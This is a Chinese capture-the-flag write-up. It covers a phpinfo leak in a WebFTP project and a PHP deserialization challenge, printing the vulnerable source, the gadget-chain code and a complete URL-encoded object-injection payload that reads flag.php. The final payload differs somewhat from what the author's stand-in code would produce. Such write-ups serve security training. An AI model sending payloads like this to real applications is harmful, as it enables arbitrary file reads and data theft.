https://github.com/wifeat/WebFTP
GitHub 上有源码，上面提到了初始账号和密码，
但是登不进去，
于是审一审源码。
| 然后意外地Readme/mytz.php?act=phpinfo
|
phpinfo里头就有flag了
pklovecloud
源码
| <?php
// Pulls in flag.php from the same directory; its contents are not shown on this page.
include 'flag.php';

/**
 * Default helper that acp's constructor stores in $cinder.
 * Its echo_name() only returns a fixed, harmless string.
 */
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
/**
 * Object whose string form is delegated to whatever object sits in $cinder.
 */
class acp
{
    // Set to a pkshow instance by the constructor. unserialize() does not run
    // __construct(), so on a deserialized instance this property holds
    // whatever the serialized data specified.
    protected $cinder;
    public $neutron;
    public $nova;

    function __construct()
    {
        $this->cinder = new pkshow;
    }

    function __toString()
    {
        // No type check on $cinder: echo_name() is called on any object stored
        // there. When $cinder is not set, the method falls through without a
        // return statement.
        if (isset($this->cinder))
            return $this->cinder->echo_name();
    }
}
/**
 * Class whose echo_name() deserializes its own $docker property and, when a
 * property comparison passes, returns the contents of a file named by $filename.
 */
class ace
{
    public $filename;
    public $openstack;
    public $docker;

    function echo_name()
    {
        // Second unserialize() call: $docker is plain object state, so on a
        // deserialized instance it is supplied by whoever built the input.
        $this->openstack = unserialize($this->docker);
        // $heat is never defined in this method, so this assigns null
        // (PHP reports an undefined-variable warning).
        $this->openstack->neutron = $heat;
        // Strict comparison of two properties of the freshly deserialized object.
        if($this->openstack->neutron === $this->openstack->nova) {
            // $filename is interpolated into the path with no validation or
            // allow-list; the file is then read twice (once as the truthiness
            // test, once for the return value).
            $file = "./{$this->filename}";
            if (file_get_contents($file)) {
                return file_get_contents($file);
            } else {
                return "keystone lost~";
            }
        }
        // When the comparison fails there is no return statement.
    }
}
// Entry point: with a `pks` query parameter the value is deserialized and
// echoed; without it the script prints its own source.
if (isset($_GET['pks'])) {
    // Request data goes straight into unserialize() with no class restriction,
    // so any class declared in this file can be instantiated with
    // caller-chosen property values. Passing ['allowed_classes' => false] as
    // the second argument, or accepting JSON via json_decode() instead,
    // removes that object-injection surface.
    $logData = unserialize($_GET['pks']);
    // echo converts the result to a string, which invokes __toString() when
    // the result is an object.
    echo $logData;
} else {
    highlight_file(__file__);
}
?>
|
class ace 这里会反序列化 docker，但是后面又会读写反序列化结果的 neutron 和 nova 属性，
说明我们的 docker 里面得放 acp 序列化的内容
| if($this->openstack->neutron === $this->openstack->nova) 判定条件里头说的
|
那么构造链条
| <?php
// Local stand-in for the challenge's acp class: same property names, no
// constructor, with neutron and nova preset to the same string.
class acp
{
    protected $cinder;
    public $neutron = 'a';
    public $nova = 'a';
}

// Print the serialized form of the stand-in object.
$a = new acp();
echo serialize($a);
|
| 得到:O:3:"acp":3:{s:9:"*cinder";N;s:7:"neutron";s:1:"a";s:4:"nova";s:1:"a";}
|
| echo 会触发 __toString()，所以在构造方法（__construct）里面把 pkshow 换成 ace，这样 __toString() 调用的就是 ace 的 echo_name() 方法
|
| <?php
// Local stand-ins that reuse the challenge's class and property names so the
// serialized output carries the same names the target script declares.
class ace
{
    public $filename = 'flag.php';
    public $openstack;
    // Serialized acp string that ace::echo_name() on the target would pass to
    // its own unserialize() call.
    public $docker = 'O:3:"acp":3:{s:9:"*cinder";N;s:7:"neutron";s:1:"a";s:4:"nova";s:1:"a";}';
}

class acp
{
    protected $cinder;
    public $neutron;
    public $nova;

    // Unlike the challenge's constructor, this one stores an ace instance
    // (not pkshow) in $cinder before the object is serialized.
    function __construct()
    {
        $this->cinder = new ace();
    }
}

// URL-encode the serialized object so it can travel in the `pks` query
// parameter. This only has an effect because the target deserializes request
// input without restricting classes.
$a = new acp();
echo urlencode(serialize($a));
|
| 得到?pks=O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A68%3A%22O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BR%3A3%3B%7D%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BR%3A6%3B%7D
|
查看源码就能拿到flag